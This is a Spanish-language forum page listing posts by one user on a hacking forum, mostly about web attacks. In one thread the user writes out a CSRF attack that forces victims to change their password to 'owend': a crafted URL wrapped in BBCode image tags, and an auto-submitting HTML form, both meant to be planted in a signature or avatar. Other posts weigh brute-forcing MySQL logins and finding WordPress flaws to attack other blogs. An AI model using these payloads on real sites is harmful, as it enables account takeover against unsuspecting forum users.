Menú

Mostrar Mensajes

Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.

Mostrar Mensajes Menú

Mensajes - ~ Yoya ~

#1101
ps si lo tienes asi:
AA BB CC DD EE FF
AA BB CC DD EE FF


Y lo quieres asi:
AA BB CC DD EE FF AA BB CC DD EE FF

Lo que deberias hacer es hacer con bat algo que quite el fin de linea, ps como sabras yo no manejo mucho bat, manejo perl xD.
#1102
Ps si quieres configurar firefox para que use automaticamente algun proxy, primeros deberias conocer los archivos de firefox para saber que archivo podes usar para nabegar/agregarle algun proxy a firefox, lo mejor seria agregar un proxy a tu script y dejar firefox por otro lado...

Saludos, tambien puedes tratar de buscar algun plugin que lo haga por ti mas facir.
#1103
Ps no mucho se puede hacer, ya que hay van los datos de acceso mysql, y es el que te guia durante la instalacion te crea las tablas requeridas, y todo eso,  si lo instala y lo tienes ayi, lo unico que pueden hacer es resetear tu bd al reinstalarlo claro si tienen los datos de acceso mysql, que es muy dificir, tambien pueden usarlo para brutear el password y usuario mysql, pero es muy dificir porque despues de x cantidad de peticiones podes bloquear la ip que esta hasiendo todas las peticiones a la vez( Claro que debes configurarlo para que bloquee las peticiones en poco tiempo o solo agregar un captha) y como ya teneis instalado el wordpress puede ser que tenga ya un sistema de proteccion....

Saludos y sigue buscando y dudo que quieras encontrar una vulnerabilidad en install.php ya que si pensais usarlo para atakar otros blog, ellos no tendran el archivo install.php porque lo borran al instalarlo por lo que mejor deberias buscar otras vulnerabilidades que no esten en archivo de instalacion o archivos que seran borrados despues de la instalacion....

#1104
haber, son recomendaciones, primero leer y luego responder una respuesta adecuada...

Saludos.
#1105
Te recomendare eso:
Mayormente los formularios se envian por POST, algunos por GET claro, lo que puedes hacer es extraer mediante una exprecion regular y verificar como se envia la peticion en el Formulario luego con una condicional if, captura la rexep y con el if lo comparas y hases la peticion que tiene el formulario... Saludos.

Otra cosa, esto no puede ser llamdo una herramienta, una herramienta es algo que te facilita hacer algo, en cambio aqui no te facilita mucho ya que tienes que editar tu code, y si no sabes python la jodes ps xD.
Tampoco tienes una verificacion si todo se ah completado correctamente... podes hacer otra peticion con un javascript que escriba algo en el codigo de fuente y con una regexp puede verificar que ese algo exista.

Saludos, todo es para mejorar.
#1106
Nivel Web / Re: [Problema] XSRF
6 Diciembre 2009, 21:18 PM
Y en BBCODE?
#1107
Nivel Web / Re: [Problema] XSRF
6 Diciembre 2009, 20:53 PM
Solo una cosa.
Que codigo debo poner en el inframe¿?, el del formulario, y me darias un ejemplo xD
#1108
Nivel Web / [Problema] XSRF
6 Diciembre 2009, 17:28 PM
Buenas, hire al punto de una vez, tengo este formulario vulnerable a XSRF/CSRF.
Estoy situado en:
www.pagina.com/login/
y tengo este formulario, que sirve para cambiar la clave.

<form name="formclave" method="post" action="cuenta.php?do=datos">
<td align="right">Clave</td>
<input type="password" name="clave">

<td align="right">Repite tu clave</td>
<input type="password" name="clave2"><input type="hidden" name="CambiarClave" value=1>
<td colspan="2" align="center"><input type="submit" value="Cambiar Clave"></td>
</form> 


Entonse quiero crear una url magica, que cambie los datos, en este caso hice la siguiente:
www.pagina.com/login/cuenta.php?do=datos&clave=owend&clave2=owend&CambiarClave=1

Para luego ponerla entre tags de img, en este caso seria bbcode y seria asi:
[img]www.pagina.com/login/cuenta.php?do=datos&clave=owend&clave2=owend&CambiarClave=1[/img]

Entonse la pongo como firma, avatar, etc... Y al cargar la imagen se haria la peticion automaticamente. Pero no funciona y me pregunte porque???, entonse lo que hice fue hacerlo manualmente usando Live HTTP Headers y hacer lo mismo pero una peticion POST y otra GET, para aclarar algunas dudas y al parecer la peticion POST funciono correctamente, pero la peticion GET no funciono, y si ponia la url magica en el navegador tampoco funcionaba, sabiendo que el nabegado hase peticiones POST, entonse me puse a crear un  formulario que rellene los datos automaticamente y haserle la peticion entre tags de img, aqui el formulario que hice.

<html><body>

<form name="formclave" method="post" action="www.pagina.com/login/cuenta.php?do=datos">
<input type="password" name="clave" value="owend">
<input type="password" name="clave2" value="owend">
<input type="hidden" name="CambiarClave" value=1>
<td colspan="2" align="center"><input type="submit" value="Cambiar Clave"></td>
</form> 
<script>document.formclave.submit()</script>
</body></html>


Entonse lo guarde como.. clave.html
Luego lo puse en localhost y al ir a su direccion:
localhost/clave.html
El formulario cargaba y luego me rediccionaba a la pagina y la clave se cambiaba.
Entonse lo que hice fue poner la direccion donde tenia la direccion del formulario creado y luego ponerlo entre tags de img, y cuando hice todo, fui a visualisar donde tenia el codigo del formulario creado para cambiar la clave, claro metida entre tags de img no paso nada, la clave no se cambio....

haber si me dicen cual es mi error.
#1109
Nivel Web / Re: Tutorial XSRF 2 Pentest
4 Diciembre 2009, 01:15 AM
Cuando hagas un tuto deberias haserlo lo mejor posibles y si te basas en algun punto mejor xD
#1110
Nivel Web / Re: Tutorial XSRF 2 Pentest
3 Diciembre 2009, 22:42 PM
Umm, no es por molestar, pero hay muxos tutoriales de XSRF con tecnicas mejores, porque existen personas como yo que no le gusta estar usando ingeneria social, podes en gancharlo en tags de img, flash, etc..., y lo montas en una pagina y al momento de ver la pagina el code cargaria automaticamente...

Saludos, los comentarios son consejos.